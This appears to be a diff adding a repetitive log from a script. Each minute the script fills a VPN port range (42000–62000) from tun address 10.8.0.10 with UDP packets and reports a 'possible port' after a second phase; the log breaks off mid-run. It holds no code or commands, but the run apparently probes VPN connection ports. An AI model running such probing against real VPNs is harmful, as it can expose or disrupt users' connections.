+Finished port fill at 2020-09-06 15:12:05 +Starting port fill at 2020-09-06 15:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:13:07 +Starting port fill at 2020-09-06 15:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:14:06 +Starting port fill at 2020-09-06 15:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:15:05 +Starting port fill at 2020-09-06 15:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:16:05 +Starting port fill at 2020-09-06 15:17:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:17:05 +Starting port fill at 2020-09-06 15:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:18:04 +Starting port fill at 2020-09-06 15:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:19:05 +Starting port fill at 2020-09-06 15:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:20:05 +Starting port fill at 2020-09-06 15:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:21:04 +Starting port fill at 2020-09-06 15:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:22:04 +Starting port fill at 2020-09-06 15:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:23:05 +Starting port fill at 2020-09-06 15:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:24:04 +Starting port fill at 2020-09-06 15:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:25:04 +Starting port fill at 2020-09-06 15:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:26:06 +Starting port fill at 2020-09-06 15:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:27:05 +Starting port fill at 2020-09-06 15:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:28:04 +Starting port fill at 2020-09-06 15:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:29:05 +Starting port fill at 2020-09-06 15:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:30:04 +Starting port fill at 2020-09-06 15:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:31:04 +Starting port fill at 2020-09-06 15:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:32:05 +Starting port fill at 2020-09-06 15:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:33:05 +Starting port fill at 2020-09-06 15:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 